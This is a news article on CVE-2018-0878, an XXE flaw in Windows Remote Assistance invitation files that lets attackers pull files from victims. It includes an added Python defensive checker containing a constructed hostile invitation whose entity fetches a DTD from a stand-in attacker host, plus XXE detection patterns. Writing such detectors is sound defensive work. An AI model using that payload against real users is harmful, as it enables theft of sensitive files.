21 Mar 2018

It is common knowledge that you should not share remote access to your computer with any untrusted party, for any reason.

But the reverse also holds: you should not trust anyone who invites you to take full remote control of their computer.

In Microsoft’s Windows Remote Assistance (Quick Assist), a vulnerability has been detected that affects all versions of Windows, including Windows 10, 8.1, RT 8.1, and 7; it allows remote attackers to steal sensitive files from the attacked machine.

Windows Remote Assistance is a feature that lets someone you trust access your computer, or lets you access theirs, in order to fix problems remotely from anywhere in the world. This built-in tool relies on the Remote Desktop Protocol (RDP) to establish a secure connection with the other person’s computer.

An information disclosure vulnerability (CVE-2018-0878) in Windows Remote Assistance, which allows attackers to obtain information that can be used to compromise the targeted system, was discovered and reported by Nabeel Ahmed of Trend Micro Zero Day.

The vulnerability affects Microsoft Windows Server 2016, Windows Server 2012 and R2, Windows Server 2008 SP2 and R2 SP1, Windows 10 (both 32- and 64-bit), Windows 8.1 (both 32- and 64-bit) and RT 8.1, and Windows 7 (both 32- and 64-bit). It resides in the way Windows Remote Assistance processes XML External Entities (XXE) and has been fixed in Microsoft’s Patch Tuesday update.

With the security patch available, technical details and proof-of-concept exploit code for the flaw have been made public.

To exploit this defect, which resides in the MSXML3 parser, the attacker uses the “Out-of-Band Data Retrieval” attack technique while allowing the victim access to his or her computer via Windows Remote Assistance. When setting up Windows Remote Assistance there are two options: invite someone to access your computer, or respond to someone who needs their computer accessed.

In the first option the user generates an invitation file, e.g. ‘invitation.msrcincident’, which contains XML data with a number of parameters and values required for authentication.

Because the parser does not properly validate the content, the attacker can simply send the victim a specially crafted Remote Assistance invitation file containing a malicious payload, tricking the targeted computer into submitting the contents of specific files from known locations to a remote server controlled by the attacker.

Microsoft explains that the stolen information could be submitted as part of the URL in HTTP request(s) to the attacker. The attacker does not need to force a user to view attacker-controlled content, but only to convince the user to take an action.
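As an added, defensive example that is not part of the original article or of any Microsoft tooling: a Python pre-check that screens a received invitation file for the XXE ingredients described above (a DOCTYPE internal subset, external SYSTEM/PUBLIC entity declarations, parameter entity references) before the file is opened. Both invitation samples and the attacker.example host are constructed for illustration; no real .msrcincident attribute names are assumed.

```python
import re

# Indicators of the XXE pattern described in the article: a DOCTYPE with an
# internal subset, entity declarations with SYSTEM/PUBLIC identifiers
# (external entities), and %name; parameter entity references, which is how
# an external DTD for out-of-band retrieval is usually pulled in.
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b[^>]*\[", re.IGNORECASE | re.DOTALL)
EXTERNAL_ENTITY_RE = re.compile(
    r"<!ENTITY\s+(%\s*)?[\w.-]+\s+(SYSTEM|PUBLIC)\s+\"[^\"]*\"", re.IGNORECASE)
PARAM_ENTITY_REF_RE = re.compile(r"%[\w.-]+;")

# Constructed sample resembling a benign invitation: plain XML, no DOCTYPE.
# Attribute names are illustrative, not the real .msrcincident schema.
BENIGN_INVITATION = """<?xml version="1.0"?>
<UPLOADINFO TYPE="Escalated">
  <UPLOADDATA USERNAME="helpdesk" RCTICKET="constructed-ticket-value"/>
</UPLOADINFO>"""

# Constructed hostile variant: an internal DTD subset declaring a parameter
# entity that fetches an external DTD (the out-of-band retrieval hook).
HOSTILE_INVITATION = """<?xml version="1.0"?>
<!DOCTYPE UPLOADINFO [
  <!ENTITY % remote SYSTEM "http://attacker.example/payload.dtd">
  %remote;
]>
<UPLOADINFO TYPE="Escalated">
  <UPLOADDATA USERNAME="helpdesk" RCTICKET="constructed-ticket-value"/>
</UPLOADINFO>"""


def xxe_indicators(xml_text: str) -> list:
    """Return the reasons this XML should be treated as suspicious.

    An empty list means no XXE indicator was found. A legitimate invitation
    has no reason to declare entities at all, so any hit is worth a block.
    """
    findings = []
    if DOCTYPE_RE.search(xml_text):
        findings.append("DOCTYPE with internal subset")
    for m in EXTERNAL_ENTITY_RE.finditer(xml_text):
        kind = "parameter" if m.group(1) else "general"
        findings.append(f"external {kind} entity via {m.group(2).upper()}")
    if PARAM_ENTITY_REF_RE.search(xml_text):
        findings.append("parameter entity reference")
    return findings


def safe_to_open(xml_text: str) -> bool:
    """True only when the invitation carries no XXE indicator."""
    return not xxe_indicators(xml_text)
```

Run the check on the raw file text before handing it to the XML parser; the hostile sample above yields three findings, the benign one none.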

Ahmed says that this XXE vulnerability can indeed be used in mass-scale phishing attacks targeting individuals, making them believe they are truly helping another person fix their issues. They are totally unaware that the .msrcincident invitation file could potentially result in the loss of sensitive information.

Windows users are strongly advised to install the latest update for Windows Remote Assistance as soon as possible.
